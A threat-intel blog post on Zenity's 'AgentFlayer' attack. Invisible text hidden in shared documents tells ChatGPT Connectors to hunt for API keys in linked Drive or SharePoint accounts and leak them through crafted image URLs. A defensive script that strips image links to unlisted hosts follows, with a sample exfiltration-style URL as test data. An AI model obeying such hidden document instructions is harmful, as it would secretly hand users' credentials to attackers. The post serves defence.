Edward Kiledjian's Threat Intel

AgentFlayer 0-click exploit abuses ChatGPT Connectors to Steal 3rd-party app data

Cybersecurity researchers at Zenity have discovered “AgentFlayer,” a critical zero-click vulnerability in ChatGPT Connectors that allows attackers to secretly steal sensitive data from users’ connected accounts like Google Drive and SharePoint. The attack uses indirect prompt injection: hidden malicious instructions are embedded as invisible text in innocent-looking documents and execute when a user asks ChatGPT to process the document. When the hidden commands activate, they instruct ChatGPT to search for sensitive information like API keys in the user’s connected accounts, then exfiltrate the data through specially crafted image URLs that send stolen information to attacker-controlled servers without the user’s knowledge or clicks. Zenity presented this vulnerability at the Black Hat conference, demonstrating how attackers can bypass OpenAI’s existing security measures and exploit the trust relationship between ChatGPT and third-party applications. This attack represents part of a larger class of AI agent vulnerabilities, with researchers warning that similar flaws are likely to emerge in other popular AI products due to poor understanding of dependencies and insufficient guardrails in AI-to-third-party integrations.
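The exfiltration step described above depends on the client fetching an image URL that the model was told to emit. As an added example (not code from Zenity or OpenAI), this is one way a team building its own agent front end could audit assistant output before rendering it; the allowlisted host, the function name `audit_images` and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the only hosts this deployment trusts to serve images.
ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.test"}

# Markdown image: ![alt](url "optional title")
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')

# Constructed sample of assistant output; the second image is the kind of
# URL the article describes, with data carried in the query string.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![logo](https://cdn.example-corp.test/logo.png)\n"
    "![status](https://collector.invalid/p.png?d=PLACEHOLDER_VALUE)\n"
)


def audit_images(model_output):
    """Return (sanitized_text, findings) for one assistant response."""
    findings = []

    def check(match):
        alt, url = match.group(1), match.group(2)
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:  # malformed URL: treat as untrusted
            parts, host = None, ""
        # Exact host match only: suffix or substring checks are bypassable,
        # and urlsplit already discards any "user@" prefix in the authority.
        if parts and parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)] if parts else []
        findings.append({"host": host, "query_keys": keys, "url_len": len(url)})
        return "[image removed: %s]" % (alt or "untitled")

    return IMAGE_RE.sub(check, model_output), findings


if __name__ == "__main__":
    text, hits = audit_images(SAMPLE_OUTPUT)
    print(text)
    for hit in hits:
        print("blocked image fetch:", hit)
```

The findings list is meant for logging and alerting: an image pointing at an unlisted host in a response that followed document processing is a useful signal for review.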